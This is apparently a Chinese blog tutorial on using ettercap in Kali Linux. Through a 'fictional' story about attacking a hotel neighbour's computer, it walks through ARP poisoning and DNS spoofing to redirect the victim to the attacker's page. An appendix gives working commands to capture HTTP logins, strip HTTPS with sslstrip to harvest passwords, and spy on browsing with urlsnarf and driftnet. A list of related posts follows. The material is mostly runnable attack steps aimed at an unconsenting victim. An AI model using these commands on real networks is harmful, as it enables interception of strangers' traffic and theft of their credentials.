笔记一:ettercap是什么?

我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的。

而ettercap是在linux下运行的 。其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等。总之这是一款强大的安全测试工具。

笔记二:DNS简单说明

了解DNS是什么:Domain Name System (域名系统 简称:DNS)       //详细资料自己查百度

了解DNS欺骗是什么:攻击者(黑客)冒充域名服务器进行欺骗的一种行为   //详细资料自己查百度

了解DNS原理原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,

这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“黑掉”了对方的网站,而是冒名顶替、招摇撞骗罢了。

笔记三:DNS欺骗举例

(故事纯属虚构):

那是一个夜黑风高的夜晚,又是刮风,有事闪电的,本想在撸几盘撸啊撸,搞的我心情一点都不好,于是关掉电脑准备睡觉了,然而突然啊的一声!瞬间把我从困意中拉了回来,在仔细一听~~~

在发现是隔壁宾馆在做爱爱,尼玛~~~搞这么大声做什么?让我怎么睡觉啊?尼玛的,决定展开一次入侵隔壁电脑。。。

准备工作:

隔壁电脑:192.168.1.12 (宾馆一般都装有还原精灵 所以电脑是裸奔(多数没装防火墙) )   //受害者机器

自带笔记本:192.168.1.11 (kali linux系统  接上宾馆自己那间房的网线)    //入侵者机器

网关IP:192.168.1.1

踩点:

怎么知道隔壁的电脑IP地址?

先看自己的房间号,比如是5-11(假如表示5楼11间房),在来到自己房间看自己电脑的IP地址,一般是192.168.1.11

那么隔壁的自己出门去看门牌就知道了,(假如是5-12),那么隔壁的IP地址就是192.168.1.12 最后在ping一下 通了 说明电脑开着,不同,说明电脑关着,或者防火墙什么的。。。

这个方法比较死?当然其它方法也有,根据自己经验而定。。。

首先先打开ettercap的DNS文件进行编辑,在kali linux2.0下的文件路径为/etc/ettercap/etter.dns

在对应的位置添加对应的 标识和IP地址  * 代表所有域名 后边就是你要欺骗为的IP地址 (192.168.1.11则为kali服务器地址),这里是当然是我自己的主机IP地址啦

然后记得保存。

再来编辑/var/www/html/index.html文件  改成你定义页面 这里我简单的改了下

因为后边我们要启动apache2 也就是网页服务器 这是主页文件, service apache2 start

说白了目的是为了DNS欺骗成功后,

当受害者(隔壁宾馆两口)访问域名访问网站后,打开的页面就是我们这里的这个主页文件里边的内容。。。。编辑好了---记得保存

现在我们在到终端输入命令/etc/init.d/apache2 start  来启动apache2 服务器 (把本机作为一个服务器) 。

在输入命令ettercap -G来进入ettercap的图形界面。我喜欢用图形界面,也许也windows玩多的原因吧,不喜欢linux下的命令行 ps:虽然看起来很帅的样子..... - -!

1)选择网卡Unfied sniffing---配置

2)网卡选择eth0(根据自己的计算机网卡而定)

3)再来扫描网关下的所以在线的计算机主机,来到hosts选项下的 scan for hosts

4)继续选着Hosts list 列出扫到的主机

5) 可以看见列出了所有机器,先在列表里选择网关进行添加,我这里的网关是192.18.1.1。 点击 Add to target 1

6)这里选择受害者的IP地址(隔壁那位妹子的。。。)

7)配置好后在继续点击mitm>arp poisoning (arp 投毒)

类似于:

arpspoof -i eth0 -t 192.168.1.12 192.168.1.1

arpspoof -i eth0 -t 192.168.1.1 192.168.1.12 

echo 1 > /proc/sys/net/ipv4/ip_forward 开启转发

8)  选择第一个勾上 确定

9) 配置插件plugins>mangge the plugins

10) 我们要进行的是DNS欺骗 双击dns_spoof 可以看见下边的提示

11 ) 最后点击strat>start sniffing开始DNS欺骗 这样就开始工作了。。。。

后续:

隔壁的妹子完事后,准备上电脑去逛逛QQ空间 不管打开任何网站页面一直是这样的。。。

哈哈~~~故事纯属虚构。。。这就是DNS欺骗啦,文章就到这里啦,要学习还很多。。。。

技术宅的路上少不了苦逼和孤独,但那又怎样,哪怕成不了大神,也要码的漂亮。

附录:

kali系统命令:
arpspoof -i 网卡 -t 目标IP 网关 #断网攻击

HTTP账号密码获取:

命令:echo 1 > /proc/sys/net/ipv4/ip_forward # 写入 1 表示开启转发功能!

可以用cat查看修改:

命令:cat /proc/sys/net/ipv4/ip_forward # 显示1表示成功开启转发功能,0表示未开启

命令:arpspoof -i 网卡 -t 目标IP 网关 #开启欺骗

用ettercap抓取登入帐号,密码:

命令:ettercap -Tq -i 网关 # T表示文本模式,q表示安静模式

HTTPS账号密码获取:
先编辑下/etc/ettercap/etter.conf
命令:vim /etc/ettercap/etter.conf
找到
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

改为(去掉两个#):
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
进入vim状态:
按下i,进入编辑
按下Esc,Shift+:,q!(不保存,退出)或 wq(保存,退出)

然后运行sslstrip -a -f -k 实现https转换成http以获取帐号密码
再用HTTP账号密码获取方法就可。

最后,补充一下kali中几个和本次实验相关的工具,以及使用方法:

urlsnarf -i eth0

在成功的ARP欺骗后,可以利用这个命令抓取流量,看目标浏览了哪些网页。

driftnet -i eth0

同理,在arp欺骗成功后,可以从网卡中抓取目标浏览的图片,但是只能是图片,而且还有一个缺陷,那就是不是所有的图片都能抓到。

初探 Ettercap: ARP投毒 DNS欺骗相关推荐

  1. ettercap局域网内DNS欺骗

    ettercap局域网内DNS欺骗(隔壁的哥们轻一点...) 笔记一:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道 ...

  2. ARP和DNS欺骗以及网站钓鱼分析

    实验目的 1.掌握ARP中间人攻击原理 2.掌握DNS欺骗原理 3.熟悉网站钓鱼的原理. 实验环境 VMware15.0.windows客户端.windows server2008.kali linu ...

  3. 利用Kali Linux的Ettercap工具实施DNS欺骗攻击

    1 DNS域名系统 DNS即Domain Name System 的缩写,是把主机域名解析IP地址的系统,解决了IP地址难记的问题,用相对好记的域名就可以对服务器进行访问,即使服务器更换了IP地址,我 ...

  4. 2.9 ARP和DNS欺骗

    1.预备知识:ARP和DNS欺骗原理 1.1ARP欺骗 ARP(Address Resolution Protocol,地址解析协议)涉及TCP\IP体系结构中网络层的IP地址和数据链路层的MAC地址 ...

  5. HTTPHTTPS账号密码获取与ettercap局域网内DNS欺骗

    kali系统命令: arpspoof -i 网卡 -t 目标IP 网关 #断网攻击 HTTP账号密码获取: 命令:echo 1 > /proc/sys/net/ipv4/ip_forward # ...

  6. ettercap局域网内DNS欺骗试验

    笔记一:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的. 而ettercap ...

  7. ettercap局域网内DNS欺骗(隔壁的哥们轻一点 ...)

    笔记一:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的. 而ettercap ...

  8. Python 实现ARP与DNS欺骗

    利用Scapy进行ARP缓存投毒 from scapy.all import * import os import sys import threading import signaldef rest ...

  9. Kali 2.0 下Ettercap 使用教程+DNS欺骗攻击

    一.Ettercap 使用教程 EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具.它具有动态连接嗅探.动态内容过滤和许多其他有趣的技巧.它支持对许多协议的主动和被动分析,并包含许多用于网络和 ...

最新文章

  1. 2022-2028年中国汽车修理行业市场前瞻与投资规划分析报告
  2. css表格文本居中的指令,CSS似乎无法在表格单元中居中文本
  3. NTU 课程 7454 (5) CNN进阶
  4. 如何扩展Android富文本之Html标签
  5. SAP Commerce Cloud 的本地开发
  6. 逐步优化求解最大子序列和
  7. std::mutex详解
  8. 机器学习初级入门(一)感知机
  9. 自制能自动加载所需RAID驱动的Windows PE系统来安装服务器系统
  10. 前端基础 IE浏览器渲染-重置浏览器默认样式
  11. Regulator的使用
  12. OSChina 周日乱弹 ——书中自有颜如玉
  13. 浅析PC机串口通讯流控制
  14. crontab 简明教程
  15. gta5怎么设置画质最好_GTA5:如何让你的游戏画质更好,游戏更顺手,一波设置教给大家!...
  16. 常用电平标准(TTL、CMOS、LVTTL、LVCMOS、ECL、PECL、LVPECL、RS232)
  17. SVN+SSH协议工作方式全解析,以Sourceforge为例讲解如何在Windows下配置TortoiseSVN和Su
  18. 2009年三季度上市公司报表4
  19. c++rpg黑框游戏_RPG游戏 C++源码 文字RPG游戏
  20. 免费注册 Redhat 开发者订阅和激活订阅

热门文章

  1. python数据分析实训心得_Python代码在实践过程中的经验总结
  2. 计算机博士英文复试自我介绍,考博英语复试自我介绍7篇自我介绍
  3. python练习, 打鱼晒网问题
  4. 关于提高信息传输率三个方法之一——增加频带宽度
  5. 警惕!国内已有5000余个网站中招!关于一种大规模的暗链劫持流量的风险提示
  6. Thin LUN 和 Thick LUN
  7. @Component什么时候使用?
  8. 什么是html超文本语言,什么是超文本?HTML超文本标记语言怎么学?
  9. 基于Java后台(Springboot框架)+前端小程序(MINA框架)+Mysql数据库的教室图书馆座位预约小程序系统设计与实现
  10. 玛雅水上乐园|玩趣系列作品集